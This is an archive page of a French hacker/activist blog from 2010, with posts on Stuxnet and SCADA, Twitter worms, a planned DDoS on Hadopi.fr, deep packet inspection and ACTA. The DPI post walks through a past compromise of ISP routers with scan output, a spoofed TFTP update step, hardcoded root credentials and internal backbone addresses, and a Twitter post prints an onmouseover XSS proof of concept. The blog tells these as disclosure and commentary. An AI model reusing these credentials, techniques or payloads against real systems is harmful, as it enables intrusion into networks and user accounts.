Net – Page 10 – ☠ Bluetouff's blog

5 octobre 20105 octobre 2010

Jérôme Kerviel condamné à 5 ans de prison dont 3 ferme

La nouvelle vient tout juste de tomber, Jérôme Kerviel vient d’écoper d’une condamnation de 5ans de prison, dont 3 fermes. Un jugement qui peut paraître lourd, une peine presque exemplaire. Mais qu’a t-on jugé ? Une chose semble cependant claire, ce n’est pas le procès de la finance qui a été ici fait, le trader est tenu pour coupable et seul responsable de la perte de 4,9 milliards d’euros qu’il devra assurer en dommages et intérêts, soit sur quelques générations (la justice vient d’inventer un nouveau moyen de contraception) . Abus de confiance, fraude informatique, tout les chefs d’inculpation semblent avoir été retenus. Le trader n’aura plus non plus le droit d’exercer.

Le procès de sa hiérarchie qui ne semblait pas non plus toute blanche dans cette affaire aura t-il lieu un jour ? Il arrivera bien un jour où certaines données se retrouveront sur Wikileaks et où nous connaîtrons le fin mot de cette affaire. Je suis personnellement persuadé que Jérôme Kerviel n’a pas pu agir sans que sa hiérarchie ne le couvre du moins partiellement. L’intrusion informatique et la falsification de certaines données ne peut tout expliquer.

5 octobre 20105 octobre 2010

Surveillermonsalarié.com est un superbe canular

Vous l’avez peut-être découvert comme moi le weekend dernier, le site Surveillermonsalarié.com a pointé son nez sur la toile. Proposant pour 790 euros HT et par poste un logiciel de surveillance capable d’intercepter des données des salariés en entreprise avec sa fonction keylogger ou encore capable de prendre un screenshot par seconde et par écran… de quoi remplir le cloud d’Amazon… ce logiciel prétend faire gagner 2 mois de productivité et par salarié aux patrons d’entreprises.

Plusieurs scénarios possibles :

Soit l’ami Damour est un très bon communicant qui a réussi un joli coup de pub pour sa société avec un logiciel qui n’a jamais existé (ce que les captures de cette solution tendent à prouver);
Soit ce logiciel qui semble totalement illégal existe bien, dans quel cas c’est vraiment de l’inconscience de sa part ;
Soit il s’agit d’une arnaque… tout simplement ;
Soit c’est un splendide piège pour les patrons qui manifestent de l’intérêt pour cette solution… attention c’est comme ça qu’on se retrouve sur 4chan.

Ma conviction est qu’il s’agit surtout d’un canular, comme expliqué ici. Désolé Korben, Guillaume, 01Net…. vous vous êtes fait piéger 😉

26 septembre 201024 février 2022

SCADA et Stuxnet ou les prémices d’une scadastrophe

Voici un thème dont j’aimerai beaucoup vous parler librement, mais voilà, ça ne va pas être possible. Sans pratiquer la langue de bois et en essayant de faire très court, je vais simplement ici vous faire part de mon sentiment sur une infection qui cible en ce moment l’Iran, l’Inde, le Pakistan et une poignée d’autres pays en Asie du sud est, mais aussi dans une moindre mesure, les continents européens et américains (voir la carte de la propagation).

SCADA, ou Supervisory Control And Data Acquisition, est un système de surveillance et d’acquisition de données qui existe maintenant depuis plusieurs décennies. SCADA opère le monitoring d’infrastructures, depuis la gestion de l’énergie dans un immeuble jusqu’à la température du noyau d’un réacteur nucléaire en passant par les ponts, les tunnels, les gazoducs, les oléoducs … Ça ne vous rappelle rien ? Moi comme ça, je pense un peu au scénario de Die Hard 4.

En clair, si un pays cherchait à paralyser un autre pays, en vue d’une attaque, SCADA serait une cible de choix. Quand j’ai commencé à m’intéresser au délit de négligence caractérisée, je me suis demandé ce que SCADA était devenu depuis l’arrivée du web… et bien c’est une … scadastrophe. On trouve certains systèmes accessibles depuis le Net, dont certains sans authentification. Ils ne sont certes pas simples à trouver, ce ne sont certainement pas les plus sensibles… mais on en trouve, et l’apparition des iPhones et autres blackberry y est surement pour quelque chose. On trouve même des clients lourds SCADA sur Megaupload pour tout vous dire… Certains chefs d’entreprises qui déploient ce genre de systèmes de contrôle aiment bien, en mobilité, garder un oeil sur leur production. Je n’irai pas plus loin pour l’instant sur le sujet et je vous donne, peut être, rendez-vous l’été prochain, pour un talk sur ce thème.

Depuis quelques mois maintenant, une infection virale, Stuxnet, cible des équipements SCADA du constructeur SIEMENS. Sa propagation, particulièrement ciblée sur, semble t-il, les infrastructures iraniennes, a de quoi soulever quelques interrogations. Les autorités iraniennes affirment que le worm n’a pour l’instant pas fait de dégâts, mais ne prépare t-il pas une attaque qui risque d’en faire bien plus (embarque t-il une bombe logique ?). Ce sont plus 30 000 machines en Iran qui en sont actuellement victimes.

Autre interrogation légitime, qui a pu mettre en place une stratégie de propagation aussi ciblée si ce n’est un État ? Certains n’hésitent pas à affirmer qu’il s’agit d’une attaque bien dirigée contre les infrastructures nucléaires iraniennes, et très franchement, je doute qu’elle soit l’oeuvre de militants Greenpeace. S’il est encore un peu tôt pour parler d’une cyber guerre, vu d’ici, ça y ressemble quand même drôlement. Israël et la Russie sont même pointés du doigt, mais à ce jour, rien ne nous autorise à l’affirmer avec certitude. Quoi qu’il en soit, le spectre d’une agence gouvernementale plane sur Stuxnet et il semble que des moyens considérables aient été déployés pour rendre cette infection possible (des moyens humains pour toucher les infrastructures sensibles en leur coeur et des moyens techniques pour coder ce worm).

Techniquement, Stuxnet exploiterait non pas un mais 4 0day (une véritable débauche de moyens !) pour s’engouffrer dans la faille LNK découverte en juin dernier et présente dans pratiquement toutes toutes les versions de Windows (jusqu’à Seven… « c’était mon idée »). Il embarquerait un rootkit et un chiffrement très complexe à casser pour cibler le Simatic WinCC de Siemens, ses systèmes SCADA et tendrait à tenter d’infecter la base de données à laquelle ces solutions se connectent. L’exécution du payload rendue possible par l’exploitation de la faille LNK permet, depuis une simple clef USB liant un appel de lien .ink, de compromettre le système en exécutant du code malicieux… c’est assez imparable et particulièrement élaboré.

Stuxnet inquiète et à juste titre, sa persistance n’est pas faite pour rassurer et on se demande qui pourrait déployer autant de moyens pour compromettre un système aussi sensible, et surtout, dans quel but.

En tout, cas… moi je dis ça mais je dis rien hein… j’en connais qui devraient sérieusement se pencher sur cette question au lieu de faire la chasse aux téléchargeurs de mp3. La compromission de SCADA, c’est tout sauf de la science fiction, et c’est tout sauf rigolo… des vies sont en jeu, et là je ne parle pas de pirates qui tuent les artistes en provocant des AVC par DDoS… mais de vrais méchants qui pourraient tuer de vrais gens.

26 septembre 201026 septembre 2010

Twitter : encore un worm !

EDIT : c’est en fait un beau CSRF sur une nouvelle feature de Twitter… juste un CSRF tout pas beau et tout vieux qui est la cause de cette nouvelle propagation (voir les commentaires ci-dessous avec le code d’exploitation). Pas de risque de compromission de vos données… pour l’instant, juste une belle iframe toute sale qui ne serait jamais arrivée là avec un code propre.

Il semble que Twitter soit pour la seconde fois cette semaine victime d’une attaque. Constaté à l’instant sur l’interface web. Les timelines se retrouvent pourries de mots doux à caractére pornographique avec un joli link qui ira lui même contaminer la timeline de vos followers…

Je n’ai pas encore le détail de l’attaque mais l’url postée semble faire un truc bizarre exploitant l’API de Twitter, à vérifier.

Bref il semble que Twitter attire l’attention de beaucoup de petits malins et que l’application elle même soit gavée de trous de sécurité… Mais qu’attendent ils pour se payer un véritable audit ?

25 septembre 201026 septembre 2010

Hadopi.fr : un intérêt manifeste

Parmi les outils de veille sur le réseau que j’affectionne, il y a Pastebin, on y trouve vraiment de tout, et pas que du code. Numerama signalait hier que le site Hadopi.fr, alors qu’il n’est toujours pas officiellement en ligne (même si le cache Google parle…), attirais déjà de nombreux curieux. Bien entendu, Pastebin atteste de la véracité de ces propos, on y trouve par exemple :

des scans nmap ;
un dig sur le domaine *.hadopi.fr.. et encore un ici … Bravo Pablo 😉 ;
Un traceroute ;
On trouve aussi des bribes de contre argumentaires comme celui ci qui nous mène aussi au plan de bataille
…

Rien de bien méchant, mais effectivement, Hadopi.fr fait l’objet d’attentions particulières, des attaques par déni de services avaient été annoncées aussitôt après les bruits sur la date de mise en ligne du site.

L’intérêt de ce DDoS est comme je vous le disais à mon sens limité et probablement dangereux en terme d’image… tout comme le serait un défacement, qui donnerait du pain béni aux personnes qui veulent policer l’internet en utilisant des outils autrement plus dangereux qu’une machine à spam, aussi coûteuse soit-elle. Espérons maintenant que les politiques éviteront les attaques inconsidérées qui attisent encore les crispations des uns et des autres… même des plus modérés.

Oui c’est compliqué, mais il n’y a pas de pédagogie vaine, il en restera toujours quelque chose… ce qui me permet d’enchaîner sur le billet suivant, dans lequel je vais tenter d’expliquer à madame Marland-Militello le combat d’arrière garde dont elle se gargarise ici… je pensais pas dire ça un jour mais je commence à regretter Frédéric Lefèbvre, ses attaques contre l’Internet étaient argumentées de manière bien plus drôles.

24 septembre 201024 septembre 2010

La menace Deep Packet Inspection : analyse de la compromission d’un FAI

L’analyse en profondeur de paquets (DPI) en coeur de réseau est le nouveau fantasme de la SCPP. Marc Guez son directeur ne doute pas un instant que grâce à cette solution miracle, il pourra reconnaître la légalité des octets qui transitent sur les réseaux des fournisseurs d’accès. En théorie, il n’est pas loin d’avoir raison. En pratique, c’est un peu moins sur… et du coup, je vais vous raconter une bien belle histoire, celle de Samir, aka sam_synack… une histoire encore parfaitement inconnue du grand public.

Ceci remonte à 2006, à l’époque, le fournisseur d’accès SFR s’appelait 9Télécom. Il distribuait des Neufbox à ses clients. À cette époque les Neufbox n’étaient pas équipées en GNU/Linux, le firmware était fermé et propriétaire. Mais un firmware fermé… ça s’ouvre. C’est bien ce qui est arrivé. Ce billet est assez technique, il dissèque la compromission du réseau d’un fournisseur d’accès Internet. Le détail du hack est ici relaté, vous comprendrez donc qu’il ne s’agit pas d’une fiction… c’est bien réel.

Analyse de la compromission de 300 000 Neufbox et du coeur de réseau d’un fournisseur d’accès par un gus dans son garage

Samir Bellabes, qui s’ennuyait en luttant contre ses insomnies, a eu la curiosité de commencer à causer avec sa Neufbox, fraîchement achetée quelque heures plus tôt… dramatiquement banal ? Attendez un peu, ce qui va suivre l’est un peu moins. La Neufbox se montre peu bavarde, mais animé par cette curiosité maladive qui anime tout hacker, Samir ne se décourage pas, il lui en faut bien plus. Sa méthode, simple et imparable, sniffer sur son réseau le trafic entre sa Neufbox et le Net et ainsi localiser le serveur depuis lequel elle se met à jour, récupérer ce firmware lors d’une mise à jour en dumpant les paquets. Appréciez la beauté du hack :

Samir scanne sa Neufbox : pas de résultat, pas grand chose à se mettre sous la dent hormis peut-être un port TCP 1287 à l’écoute à garder sous le coude :

sam@urg:~$ sudo nmap -sT 192.168.1.1 -p 1-65535
Starting Nmap 5.00 ( http://nmap.org ) at 2010-09-22 14:58 CEST
Interesting ports on 192.168.1.1:
Not shown: 65530 filtered ports
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
1287/tcp open unknown
1288/tcp open unknown
8080/tcp closed http-proxy

sam@urg:~$ telnet 192.168.1.1 1287
Trying 192.168.1.1…
Connected to 192.168.1.1.
Escape character is ‘^]’
.Foxconn VoIP TRIO 3C, F01L010.00_LDCOM MAC: , VOIP FLG=1
Login:

Il éteint sa Neufbox et la raccorde en ethernet à sa machine sur laquelle il lance tcpdump ;
La Neufbox effectue une requête « ARP, Request who-has 10.0.0.1 » vers sa machine, donc la neufbox recherche le serveur 10.0.0.1;
Bien entendu, sa machine ne peut répondre à cette requête ;
Samir débranche le RJ11 sur lequel le signal ADSL arrive dans la box, configure sa machine pour prendre l’adresse 10.0.0.1 et rallume la neufbox ;
Bingo, sa machine répond cette fois ci à la requête ;
Cette requête servait pour la box à déterminer où se trouve Internet et où se trouve le réseau local … Samir vient de tromper la Neufbox … sans une seule ligne de code ;
Une série de requêtes UDP et TCP se sont alors lancées depuis la Neufbox (recherche des serveurs de VoIP par exemple);
Mais le plus intéressant : une connexion UDP vers un serveur d’adresse publique 80.118.192.97, et vers un port de destination identifié comme du TFTP ;
Sur sa machine, Samir monte donc un serveur TFTP en écoute en attribuant arbitrairement à l’interface en écoute cette adresse publique ;
Il rallume sa box, et alors que la Neufbox cherche le serveur public, c’est sa machine qui répond, la Neufbox s’y connecte donc naturellement ;
La Neufbox demande à sa machine le fichier LatestVersion.general (listant les firmwares disponibles comme on le découvre plus tard);
Samir a donc maintenant assez d’informations pour aller chercher le vrai serveur public TFTP qui gère les mises à jour ;
Le firmware est capturé :

sam@fin:~/tmp$ tftp 80.118.192.97
tftp> get F01L010.00_LDCOM-V1.6.19_AV225165_V060419_00_full.tar
Received 1666745 bytes in 6.4 seconds
tftp> quit
sam@fin:~/tmp$ file *
F01L010.00_LDCOM-V1.6.19_AV225165_V060419_00_full.tar: data
LatestVersion.general: ASCII text

Et là, c’est le drame, une petite recherche dans le firmware sur la chaine de caractères « password » lui renvoit ceci :

httpd_username1=tibma
httpd_password1=ambit
httpd_username2=root
httpd_password2=aEzebRAWiF

Ces login/pass sont fonctionnels sur l’interface web de la Neufbox. Mais surtout retournons voir le CLI sur le port TCP 1287 et son prompt login, et là encore pas de souci, le mot de passe root permet d’être root sur la Neufbox.
Immédiatement on trouve le nom du CLI : ISOS et sa doc http://89.96.243.158/download/USERGUIDE/985_a02-ra3_cli.pdf
Il y a 2 interfaces (WAN et LAN) et l’interface WAN possède un adresse IP de classe privée du sous-réseau 172.16.0.0/12. (disons 172.16.42.42) … Curieux.
C’est là que Samir se rend compte qu’il peut envoyer du trafic à l’adresse IP voisine (par exemple 172.16.42.43, c’est à dire à une possible autre Neufbox. Un seul moyen de vérifier, se logger et éteindre cette Neufbox. C’est fait, le modem voisin ne répond plus.

La Neufbox de Samir est rootée, ainsi que plus de 300 000 de ses petites sœures !

En même temps qu’il recherche un mécanisme pour exploiter à grande échelle ces informations, il continue ses recherches basées sur les informations du firmware : les noms des serveurs donnant des adresses IP qui donnent des plages de réseau : 212.94.162.0, tftp.neufbox.neuf.fr, dhcp.neufbox.neuf.fr, ..

Et ce n’est pas fini…

Il scanne la plage IP, extrait :

Host pradius-dsl-2.gaoland.net (212.94.162.16) is up (0.039s latency).
Host mrtg.gaoland.net (212.94.162.5) is up (0.030s latency).
Host dns1.gaoland.net (212.94.162.1) is up (0.025s latency).
Host pippin.gaoland.net (212.94.162.15) is up (0.039s latency).
Host babar.gaoland.net (212.94.162.67) is up (0.027s latency).

Sur ce dernier serveur, le navigateur demande une authentification pour un mécanisme de sauvegarde à des routeurs BB IP … BACKBONE pwn3d !

Samir vient de taper à la porte du backbone… tout juste là où les partisans de la DPI souhaiteraient placer leurs équipements ! Le tout est accessible depuis le Net…. magnifique non ?

Et là vous vous dites que c’est blindé, pas moyen de passer ? Voici ce que trouve Samir : Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny8 with Suhosin-Patch Server at babar.gaoland.net … Blindé en effet … enfin presque.
Dans la suite de la recherche, une autre plage intéressante est aussi apparue :

inetnum: 80.118.192.0 – 80.118.197.255
netname: N9UF-INFRA
descr: BIB backbone

Happy End

Samir est un hacker sympa, pas un terroriste, il avertit donc aussitôt Neuf qui corrige, il n’a pas exploité ses trouvailles, il ne les a pas revendues sur une board russe… un vrai coup de bol pour les 300 000 abonnés de Neuf qu’il avait à portée de shell. Cette histoire n’a jamais filtré, c’était il y a 5 ans, et la révéler aujourd’hui ne porte pas préjudice au fournisseur d’accès. Par contre elle soulève des question très lourdes.

Que faut il retenir de cette petite histoire ?

Il n’en a pas fallu plus pour compromettre l’infrastructure du réseau de Neuf : un ordinateur et un gus dans son garage.. sans aucune ligne de code et toute l’infrastructure réseau d’un fournisseur d’accès est mise à nue. Cette même infrastructure au cœur de laquelle certains inconscients aimeraient placer des dispositifs d’écoute généralisée… à la portée de n’importe quel état, de n’importe quelle officine qui s’en donnerait les moyens… et d’un gus dans un garage !

Conclusion

La sécurité est un mécanisme global, qui fonctionne par des liens entres différents niveaux de couches et de services. Elle ne se résoud pas uniquement avec une boite gavée de GPU sur un lien réseau en terabit. Des entreprises voudraient utiliser les informations du réseau, vos informations, vos communications, afin de réaliser leur analyse et en déduire leur « légalité ». Il est clair que les solutions que la HADOPI a pour mission de labelliser seront des logiciels de lutte contre l’échange de fichiers. Ceci se fera au risque de compromettre la sécurité des utilisateurs et des entreprises. Là où on nous souffle le terme de « logiciels de sécurisation » et où le mot d’ordre est un concept aussi fumeux que la protection des lignes ADSL pour éviter de se rendre coupable d’un délit de « négligence caractérisée« , il faut bien lire « surveillance généralisée ». Si le grand public a un besoin réel de sécurisation, de confiance dans le réseau et de protection, il ne faut pas non plus nous faire prendre des vessies pour des lanternes : le produit Qosmos/Vedicis n’est pas une solution de securisation, mais bien de surveillance.

S’il fallait trouver un moyen efficace d’offrir l’opportunité à des personnes mal intentionnées de mettre la main sur les données personnelles de millions de particuliers et d’entreprises, nous ne pourrions pas mieux nous y prendre qu’en plaçant des équipements de DPI en cœur de réseau…

Voulez vous vraiment vous rendre coupable d’une négligence caractérisée mettant en péril notre sécurité nationale Monsieur Guez ? Pensez vous que la défense de vos intérêts (et non ceux des artistes) en vaut les risques encourus ?

Être conscient des peurs sur la DPI est une chose, prendre conscience des risques en est une autre. Il est grand temps que nos responsables politiques sifflent la fin de la récréation. Si les libertés individuelles ont une fâcheuse tendance à devenir un produit d’exportation, il est impératif que ces dispositifs dangereux pour la sécurité de nos concitoyens le restent.

23 septembre 201023 septembre 2010

HADOPI : DDoS annoncé pour accueillir Hadopi.fr

Cette fois ça y’est, le site de la HADOPI devrait ouvrir ses portes dés demain… et la riposte pas franchement graduée est en train de s’organiser sur les boards. Un appel on ne peut plus explicite au Raid a été lancé. C’était bien prévisible, Read Write Web avait même parlé de cette escalade très récemment. Selon les information de PcInpact, c’est Extelia qui pourrait bien déguster du /b/ (j’ai presque l’envie de vous dire qu’il s’agirait d’une réponse du berger à la bergère, mais mes propos pourraient être mal interprétés). L’appel aux armes lancé sur 4chan et déjà largement relayé porte les couleurs des Anonymous. En anglais, il atteste que le conflit est en train de s’internationaliser, et ça c’est une très mauvaise nouvelle pour les ayants droit.

Personnellement, je suis très réservé sur le bien fondé de ce raid…. Je comprends bien que ça nous démange tous, mais à l’heure actuelle ceci ne ferait que nous porter préjudice. Ce qui me dérange sur ce coup, c’est que j’ai l’impression qu’on se trompe de cible. Ce sont les ayants droit qui sont la cause du bridage de l’Internet, la HADOPI est une émanation de leur lobbying et ce serait donner ici à l’Autorité un argument de plus pour clore tout dialogue et de se lancer dans une application aussi stricte qu’absurde de la loi.

… et sarcastiquement, on pourrait aussi vous renvoyer que la bande passante cramée pour ce DDoS est sponsorisée par vos impôts.

21 septembre 201021 septembre 2010

Chassez l’ACTA et il revient au Gallo !

Le rapport Gallo, sera présenté demain, 22 septembre, au Parlement Européen. Ce rapport soutien le côté le plus obscur et le plus contestable de ce que l’ACTA porte. Sous prétexte de défense du droit d’auteur, c’est à une atteinte aux libertés des auteurs qu’il représente, contestant ou négligeant les exceptions au droit d’auteur dans le plus grand mépris de l’intérêt général.

Le rapport Gallo, très en phase avec la politique menée en France sur la sacralisation outrancière du droit d’auteur dans le mépris des libertés individuelles,encourage la répression préconisée dans la ligne dure de l’ACTA et se livre à ces sempiternels amalgames entre contrefaçon de biens matériels et l’échange de fichiers sur Internet. Encore une fois, tout est fait pour présenter le déclin des industries culturelles comme une conséquence de l’échange de fichiers sur Internet, un véritable non sens, argument déjà maintes fois démonté par des études indépendantes qui concluent toutes sur les effets bénéfiques de l’échange sur les ventes de ces biens culturels.

La pauvreté de ce rapport se traduit par une énième volonté de sensibilisation des citoyens aux vertus de la propriété intellectuelle à outrance au détriment de l’intérêt public, une belle farce quand on voit ce qu’est aujourd’hui l’offre légale : une petite épicerie de quartier face à n’importe quel tracker torrent moyen.

Nous nous devons de suivre, avec la plus extrême vigilance le vote de demain, car si la Déclaration 12 récemment adoptée par une majorité d’eurodéputés pourrait tendre à faire penser que le rapport Gallo va naturellement être rejeté, on sait que la politique européenne peut se jouer à, sur un malentendu, à une très courte majorité, entretenu par la résolution alternative de la ALDE qui tente de charmer les plus indécis. Cette résolution alternative de la ALDE reste un faux nez des positions inacceptables de l’ACTA qui prône entre autre une répression mondiale en se passant du juge, par des officines mandatées par les croisés du copyright. C’est d’ailleurs souvent là où les attend les moins que les horreurs d’ACTA nous reviennent régulièrement.

Espérons donc que la résolution des verts européens l’emportera demain et que le rapport Gallo sera rejeté, il n’est toujours pas trop tard pour appeler vos eurodéputés.

Répondez à l’appel de la Quadratrure du Net et participez en 5 minutes au rejet du rapport Gallo!

21 septembre 201021 septembre 2010

Twitter et le worm du onmouseover

Comme de nombreuses personnes, je me suis fait piéger en utilisant un bouton de retweet… enfin piégé, comme les contacts qui me l’ont filé et comme les contacts à qui je l’ai refilé, en fait c’est imparable, le seul moyen de l’éviter est de ne pas se rendre sur twitter.com. Vous vous doutez bien que certains n’ont pas manqué l’occasion de me taquiner, et ils ont raison. Leur point commun : aucun d’entre eux n’utilise l’interface web mais un client Twitter. Les clients tiers ne sont pas concernés (enfin s’ils n’executent pas de javascript douteux et non du Java comme j’ai pu le lire dans la presse). Cest bien le site web de Twitter qui est affecté et il est donc vivement recommandé de ne pas l’utiliser pour le moment, rabattez vous sur un client qui gère les script/noscript plus correctement que le site web lui même. C’est un XSS qui est actuellement exploité et que les utilisateurs se refilent gentiment. Tout ceci ne fait qu’apporter un peu plus d’eau au moulin sur une question que je m’étais posé en lisant le décret d’application HADOPI qui touche à la sécusation de sa connexion Internet :

où s’arrête la connexion Internet que je suis sensé sécuriser ?

Réponse A : à ma machine ?
Réponse B : à ma box ?
Réponse C : au noeud de raccordement de mon opérateur ?
Réponse D : au site web que je visite ?

… voici la démonstration parfaite que sécuriser une « connexion Internet » ne veut RIEN dire ! La vulnérabilité exploitée sur Twitter peut servir à compromettre des millions de données de particuliers, et donc des accès à leur LAN, ajoutez à ça que tout se retrouve en ce moment sur pastebin.. public… Sur ce point, n’en déplaise à certains experts, tout expert soient ils, plaider en faveur de la sanction des utilisateurs est une ânerie.

Je n’ai pas observé de vol de compte ou autre vol de session dans le submit de l’url générée par la connexion via le mouseover, mais une exploitation plus méchante pourrait faire beaucoup de mal. Le worm renvoi à une url piégée qui peut contaminer votre machine (je n’ai pas eu ce privilège car je ne suis pas sur Windows, je n’ai pas eu le droit à une redirection et je n’ai pas cliqué sur l’url générée), mais il serait intéressant d’aller jeter un oeil sur les malwares qui s’y trouvent.. Cependant je m’excuse auprès des follower auxquels j’ai surement transmis le tweet piégé (je l’ai aussitôt effacé de ma timeline).

La source viendrait d’un compte créé pour l’occasion @rainbowtwtr, le poc est très simple, ça nous donne un truc du type :

http://twitter.com/pwn3d@ « onmouseover = » javascript: window.location = « http://www.urlpiegee.com ‘,’ /

… simple mais efficace. Attendez vous à des variantes aujourd’hui même qui pourraient être plus méchantes, le risque est présent tant que twitter n’aura pas corrigé la vulnérabilité exploitée sur son propre site.

Comme Google en atteste, ce worm fait mal avec plus de 18000 réponses pour le moment (Twitter étant un média social viral par excellence, c’est un terrain de choix pour la propagation de ce genre de choses).

Le conseil du moment : utilisez un client Twitter (une extension pour votre navigateur ou autre, mais ne passer pas par le site twitter.com

20 septembre 201021 septembre 2010

Ubuntu : configuration NVIDIA GT 220 aux petits oignons

Ubuntu est un OS que j’utilise très volontiers sur un mon desktop. Sa simplicité d’utilisation et d’installation en font un système que l’on peut recommander à n’importe quelle personne voulant s’adonner à la découverte de GNU/Linux. Cependant, il arrive, comme pour tout système d’exploitation, que certaines choses fonctionnent plus ou moins bien. J’ai expérimenté quelques petites galères ce soir, rien de bien grave, mais je me suis dit que faire un petit billet là dessus pourrait peut être aider quelques personnes qui se retrouveraient dans la même panade.

Ma carte graphique, une NVIDIA GT220, suite à je ne sais trop quelle manipulation stupide de ma part, ne voulait plus rien entendre, impossible d’avoir mon Compiz fonctionnel sur mes deux écrans. Après quelques désinstallations / réinstallations via les packages et quelques reconfigurations de Xorg, je me suis résigné à tout virer pour partir du binaire tout propriétaire et sale de NVIDIA. La manipulation n’est franchement pas complexe :

1° On commence par récupérer notre binaire ici (si votre architecture est en 32bits, prenez soin de ne pas télécharger celui ci mais celui qui correspond à votre architecture), il s’agit de la version 190.53 au moment où j’écris ces lignes. Une fois le pilot téléchargé, il va falloir le rendre exécutable. Pour ce faire, faites un clic droit sur le binaire, cliquez sur l’onglet permissions, et vers le bas de la fenêtre, à la ligne exécution, cochez « autoriser l’exécution du fichier comme un programme. »

2° On installe les kernel headers de notre noyau (installez les sources pour votre version de kernel en prenant soin de vérifier avec la commande uname, il est probable que nous n’ayons pas le même noyau) :

$ uname -a Linux hysteria 2.6.32-24-server #43-Ubuntu SMP Thu Sep 16 16:05:42 UTC 2010 x86_64 GNU/Linux $ sudo apt-get install linux-headers-2.6.32-24-server

3° On passe maintenant à l’installation du driver. On commence par fermer son X :

$ sudo /etc/init.d/gdm stop

Puis on lance l’installation :

$ cd Bureau $ sudo ./NVIDIA-Linux-x86_64-190.53-pkg2.run

… laissez vous guider, tout devrait se passer en douceur. A l’issue de l’installation, redémarrez votre X :

$ sudo /etc/init.d/gdm start

Et vous voilà avec une build toute fraîche qui devrait vous permettre de profiter de l’accélération graphique de votre carte. Ici en mode multi screen :

Cookie	Durée	Description
cookielawinfo-checkbox-analytics	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Analytics".
cookielawinfo-checkbox-functional	11 months	The cookie is set by GDPR cookie consent to record the user consent for the cookies in the category "Functional".
cookielawinfo-checkbox-necessary	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookies is used to store the user consent for the cookies in the category "Necessary".
cookielawinfo-checkbox-others	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Other.
cookielawinfo-checkbox-performance	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Performance".
viewed_cookie_policy	11 months	The cookie is set by the GDPR Cookie Consent plugin and is used to store whether or not user has consented to the use of cookies. It does not store any personal data.